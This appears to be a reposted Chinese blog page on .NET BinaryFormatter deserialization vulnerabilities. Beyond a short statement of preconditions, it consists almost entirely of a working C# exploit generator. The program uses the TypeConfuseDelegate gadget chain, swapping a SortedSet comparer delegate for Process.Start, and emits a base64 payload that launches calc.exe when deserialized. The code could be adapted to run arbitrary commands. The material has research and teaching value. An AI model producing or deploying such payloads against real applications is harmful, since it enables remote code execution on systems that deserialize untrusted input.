.Net反序列化漏洞之BinaryFormatter

https://googleprojectzero.blogspot.com.es/2017/04/exploiting-net-managed-dcom.html

目前創(chuàng)新互聯(lián)公司已為上1000家的企業(yè)提供了網(wǎng)站建設(shè)、域名、虛擬空間、網(wǎng)站改版維護(hù)、企業(yè)網(wǎng)站設(shè)計(jì)、匯川網(wǎng)站維護(hù)等服務(wù)，公司將堅(jiān)持客戶導(dǎo)向、應(yīng)用為本的策略，正道將秉承"和諧、參與、激情"的文化，與客戶和合作伙伴齊心協(xié)力一起成長，共同發(fā)展。

.Net反序列化導(dǎo)致RCE的樣例，有兩點(diǎn)限制：

1. BinaryFormatter::Deserialize反序列化的內(nèi)容用戶可控
2. .Net SDK大于等于4.5

using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Reflection;
using System.Runtime.Serialization.Formatters;
using System.Runtime.Serialization.Formatters.Binary;
using System.Text;
using System.Threading.Tasks;

namespace Deserializer
{
    class Program
    {
        public static void getCalcPayload()
        {
            // Create a simple multicast delegate
            Delegate d = new Comparison<string>(String.Compare);
            Comparison<string> d2 = (Comparison<string>)MulticastDelegate.Combine(d, d);

            // Create set with original comparer
            IComparer<string> comp = Comparer<string>.Create(d2);
            SortedSet<string> set = new SortedSet<string>(comp);

            set.Add("calc");
            set.Add("adummy");

            TypeConfuseDelegate(d2);

            BinaryFormatter formatter = new BinaryFormatter
            {
                AssemblyFormat = FormatterAssemblyStyle.Simple
            };

            using (MemoryStream stream = new MemoryStream())
            {
                formatter.Serialize(stream, set);
                int position = (int)stream.Position;
                byte[] array = stream.GetBuffer();

                Array.Resize<byte>(ref array, position);

                String payload = Convert.ToBase64String(array);
                Console.WriteLine("Calc.exe PayLoad:" + payload);

                //FileSystemUtils.Pullfile(payload, "payload_calc.dat");

                stream.Position = 0;
                formatter.Deserialize(stream);
            }
        }

        static void TypeConfuseDelegate(Comparison<string> comp)
        {
            FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList",
                                    System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Instance);

            object[] invoke_list = comp.GetInvocationList();

            // Modify the invocation list to add Process::Start(string, string)
            invoke_list[1] = new Func<string, string, Process>(Process.Start);
            fi.SetValue(comp, invoke_list);

        }

        static void Main(string[] args)
        {
            getCalcPayload();
        }
    }

}

分享標(biāo)題：.Net反序列化漏洞之BinaryFormatter
文章URL：http://m.kartarina.com/article24/gesdje.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供網(wǎng)站導(dǎo)航、關(guān)鍵詞優(yōu)化、App設(shè)計(jì)、品牌網(wǎng)站建設(shè)、Google、云服務(wù)器

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來源： 創(chuàng)新互聯(lián)